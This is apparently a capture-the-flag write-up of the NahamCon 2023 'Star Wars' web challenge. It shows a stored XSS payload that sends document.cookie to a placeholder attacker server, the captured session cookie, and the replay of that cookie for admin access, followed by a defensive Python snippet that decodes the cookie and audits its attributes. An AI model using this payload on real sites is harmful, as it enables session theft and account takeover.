Tags: xss 

Nahamcon CTF 2023: Star Wars (Web)

Description

If you love Star Wars as much as I do you need to check out this blog!

Solution

Can't create an account or sign up as admin.

We register as cat and find a guestbook; an XSS payload posted there steals the cookie:

<script>new Image().src='http://ATTACKER_SERVER.ngrok-free.app?c='+document.cookie</script>

A request is made to our server containing the cookies, including a JWT:

127.0.0.1 - - [15/Jun/2023 23:09:24] "GET /?c=ss_cvr=3ad69c49-d9aa-4fb0-b6f1-5c38324adf3b|1686862282337|1686862282337|1686862282337|1;%20x-wing=eyJfcGVybWFuZW50Ijp0cnVlLCJpZCI6MX0.ZIuMEw.0OSvB-AGOciNuH-n824cnC9uTFE HTTP/1.1" 200 -

We replace the session cookie with eyJfcGVybWFuZW50Ijp0cnVlLCJpZCI6MX0.ZIuMEw.0OSvB-AGOciNuH-n824cnC9uTFE and receive a flag!
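As an added example (not part of the original writeup), the stolen x-wing cookie is three base64url segments, payload.timestamp.signature, the layout of a Flask/itsdangerous session cookie, so its two unsigned parts can be decoded to see exactly what the server trusted; the Set-Cookie header check shows the attribute whose absence let document.cookie expose the value. The Set-Cookie strings are constructed, and the signature is not verified because that needs the server's secret key.

```python
"""Added example: inspect a stolen Flask-style session cookie and
check Set-Cookie hardening. Not code from the original writeup."""
import base64
import json
from datetime import datetime, timezone

# Cookie value captured in the writeup's server log (x-wing=...).
STOLEN_COOKIE = "eyJfcGVybWFuZW50Ijp0cnVlLCJpZCI6MX0.ZIuMEw.0OSvB-AGOciNuH-n824cnC9uTFE"


def _b64url_decode(part: str) -> bytes:
    # itsdangerous strips '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_session_cookie(cookie: str) -> dict:
    """Split payload.timestamp.signature and decode the two unsigned parts.
    The signature is only checkable with the server's SECRET_KEY, which is
    why merely possessing the cookie is enough to act as that user."""
    payload_b64, ts_b64, signature = cookie.split(".")
    payload = json.loads(_b64url_decode(payload_b64))
    # Timestamp is a big-endian integer of seconds since the Unix epoch.
    issued_at = int.from_bytes(_b64url_decode(ts_b64), "big")
    return {"payload": payload, "issued_at": issued_at, "signature": signature}


def cookie_age_ok(cookie: str, now: int, max_age: int) -> bool:
    """Server-side freshness check: reject a replayed cookie older than max_age seconds."""
    issued_at = decode_session_cookie(cookie)["issued_at"]
    return 0 <= now - issued_at <= max_age


def missing_cookie_attributes(set_cookie: str) -> list:
    """Return the defensive attributes absent from a Set-Cookie header.
    HttpOnly is the one that keeps the value out of document.cookie."""
    attrs = {a.strip().split("=")[0].lower() for a in set_cookie.split(";")[1:]}
    return [f for f in ("HttpOnly", "Secure", "SameSite") if f.lower() not in attrs]


if __name__ == "__main__":
    info = decode_session_cookie(STOLEN_COOKIE)
    print(info["payload"])  # {'_permanent': True, 'id': 1}
    print(datetime.fromtimestamp(info["issued_at"], timezone.utc).isoformat())
    # Constructed headers: the weak form beside the hardened one.
    print(missing_cookie_attributes("Set-Cookie: x-wing=abc; Path=/"))
    print(missing_cookie_attributes("Set-Cookie: x-wing=abc; Path=/; HttpOnly; Secure; SameSite=Lax"))
```

The payload holds nothing but a user id, so whoever presents a validly signed cookie is that user until it expires; HttpOnly on the cookie and a short lifetime are the two controls this attack path runs into.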

flag{a538c88890d45a382e44dfd00296a99b}
Original writeup (https://github.com/Crypto-Cat/CTF/blob/main/ctf_events/nahamcon_23/web/star_wars.md).